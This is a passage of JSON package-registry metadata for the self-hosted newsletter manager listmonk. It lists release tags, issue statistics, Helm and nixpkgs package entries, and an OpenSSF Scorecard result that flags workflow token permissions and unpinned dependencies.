ests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-18T02:47:53.806Z","dependent_packages_count":0,"downloads":0,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":0.0,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:helm/helm-charts-nr/listmonk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/helm/helm-charts-nr/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/helm/helm-charts-nr/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/helm/helm-charts-nr/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-11T05:00:15.084Z","issues_count":923,"pull_requests_count":424,"avg_time_to_close_issue":6063203.975,"avg_time_to_close_pull_request":1067791.0233918128,"issues_closed_count":640,"pull_requests_closed_count":342,"pull_request_authors_count":188,"issue_authors_count":621,"avg_comments_per_issue":2.734561213434453,"avg_comments_per_pull_request":1.0919811320754718,"merged_pull_requests_count":240,"bot_issues_count":0,"bot_pull_requests_count":66,"past_year_issues_count":95,"past_year_pull_requests_count":67,"past_year_avg_time_to_close_issue":3185527.6666666665,"past_year_avg_time_to_close_pull_request":636134.3191489362,"past_year_issues_closed_count":33,"past_year_pull_requests_closed_count":47,"past_year_pull_request_authors_count":44,"past_year_issue_authors_count":81,"past_year_avg_comments_per_issue":1.4105263157894736,"past_year_avg_comments_per_pull_request":1.462686567164179,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":15,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/helm-charts-nr%2Flistmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/helm-charts-nr%2Flistmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/helm-charts-nr%2Flistmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/helm-charts-nr%2Flistmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/helm-charts-nr%2Flistmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/helm-charts-nr%2Flistmonk/codemeta","maintainers":[],"registry":{"name":"artifacthub.io","url":"https://artifacthub.io","ecosystem":"helm","default":true,"packages_count":18199,"maintainers_count":0,"namespaces_count":5397,"keywords_count":10063,"github":"artifacthub","metadata":{"funded_packages_count":1011,"rate_limit":0.5},"icon_url":"https://github.com/artifacthub.png","created_at":"2026-01-29T12:56:41.438Z","updated_at":"2026-09-01T05:05:43.053Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/namespaces"}},{"id":13181260,"name":"listmonk","ecosystem":"nixpkgs","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard.","homepage":"https://github.com/knadh/listmonk","licenses":"AGPL-3.0-only","normalized_licenses":["AGPL-3.0-only"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T23:34:07.119Z","latest_release_published_at":"2026-02-01T23:34:07.119Z","latest_release_number":"3.0.0","last_synced_at":"2026-08-21T09:29:20.566Z","created_at":"2026-02-01T23:34:06.276Z","updated_at":"2026-08-25T19:04:40.817Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=listmonk","install_command":"nix-env -iA nixpkgs.listmonk","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/by-name/li/listmonk/package.nix#L50","metadata":{"nix_attribute":"listmonk-3.0.0","position":"pkgs/by-name/li/listmonk/package.nix:50","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-22T08:24:51.000Z","size":52262,"stargazers_count":23109,"open_issues_count":109,"forks_count":2551,"subscribers_count":142,"default_branch":"master","last_synced_at":"2026-08-25T13:49:36.001Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-25T13:22:53.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using 